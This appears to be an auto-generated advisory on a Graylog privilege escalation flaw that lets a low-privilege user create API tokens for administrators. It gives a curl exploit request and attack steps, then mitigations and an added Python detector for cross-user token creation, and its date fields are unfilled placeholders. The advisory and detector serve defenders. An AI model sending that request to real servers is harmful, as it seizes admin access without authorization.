How the CVE Works
The vulnerability in Graylog allows any authenticated user to create API tokens for any other user, including administrators, because the REST API does not sufficiently check permissions on this operation. An attacker holding a valid low-privilege account can send requests to /api/users/{user_id}/tokens/{token_name} naming another user, and the resulting token carries that user's privileges. This bypasses the intended restriction that users may only create tokens for themselves, enabling unauthorized administrative access.
DailyCVE Form
Platform: Graylog
Version: <6.2.0
Vulnerability: Privilege Escalation
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch expected by 2023-XX-XX
What Undercode Says
Check existing API tokens:
`curl -X GET -H "Authorization: Bearer <ADMIN_TOKEN>" http://graylog/api/users/tokens`
Exploit request (malicious):
`curl -X POST -H "X-Requested-By: attacker" -H "Authorization: Bearer <USER_TOKEN>" http://graylog/api/users/admin/tokens/exploit_token`
How the Exploit Works
1. Authenticate with a low-privilege account.
2. Send crafted POST request to `/api/users/admin/tokens/{token_name}`.
3. Use generated token for admin access.
Protection from this CVE
- Upgrade to Graylog ≥6.2.0.
- Disable “Allow users to create personal access tokens” in System > Configuration.
- Rotate all API tokens post-patch.
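A detection check to pair with the mitigations above, added here as an example and not code from this post or from Graylog: it scans access-log lines for POST requests to the token-creation endpoint named in the advisory where the authenticated user differs from the user in the path. The log line format and the sample lines are constructed assumptions; adapt the regex to the proxy or audit-log format actually in front of your Graylog instance.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import unquote

# Constructed access-log format (an assumption, not Graylog's own format):
#   <ISO timestamp> <authenticated user> <method> <path> <status>
LINE_RE = re.compile(r'^(\S+) (\S+) (GET|POST|PUT|DELETE) (\S+) (\d{3})$')
# Token-creation endpoint from the advisory: /api/users/{user_id}/tokens/{token_name}
TOKEN_PATH_RE = re.compile(r'^/api/users/([^/]+)/tokens/([^/]+)/?$')

@dataclass(frozen=True)
class Finding:
    timestamp: str
    actor: str        # user who authenticated the request
    target_user: str  # user named in the path, i.e. who the token is created for
    token_name: str
    status: int       # 2xx = token was issued; 403 = attempt blocked (still worth alerting)

def find_cross_user_token_creation(lines: Iterable[str]) -> List[Finding]:
    """Return every token-creation POST whose path user differs from the actor."""
    findings: List[Finding] = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not in the expected format; skip rather than guess
        ts, actor, method, url, status = m.groups()
        if method != "POST":
            continue  # listing tokens (GET) is not creation
        path = url.split("?", 1)[0]  # drop query string before matching the route
        pm = TOKEN_PATH_RE.match(path)
        if not pm:
            continue
        target, token = unquote(pm.group(1)), unquote(pm.group(2))
        if target != actor:
            findings.append(Finding(ts, actor, target, token, int(status)))
    return findings

# Constructed sample log: one benign self-service token, one cross-user creation that
# succeeded, one token listing, one blocked attempt with a query string, one self token.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z alice POST /api/users/alice/tokens/ci-token 200
2024-01-01T10:01:00Z bob POST /api/users/admin/tokens/exploit_token 200
2024-01-01T10:02:00Z bob GET /api/users/admin/tokens 200
2024-01-01T10:03:00Z carol POST /api/users/admin/tokens/x?pretty=true 403
2024-01-01T10:04:00Z dave POST /api/users/dave/tokens/t/ 200
"""
```

Running `find_cross_user_token_creation(SAMPLE_LOG.splitlines())` flags bob's successful creation of a token for admin and carol's blocked attempt; the self-service tokens and the GET listing are ignored.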
Impact
- Unauthorized admin access.
- Potential full system compromise.
- Data exfiltration or service disruption.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode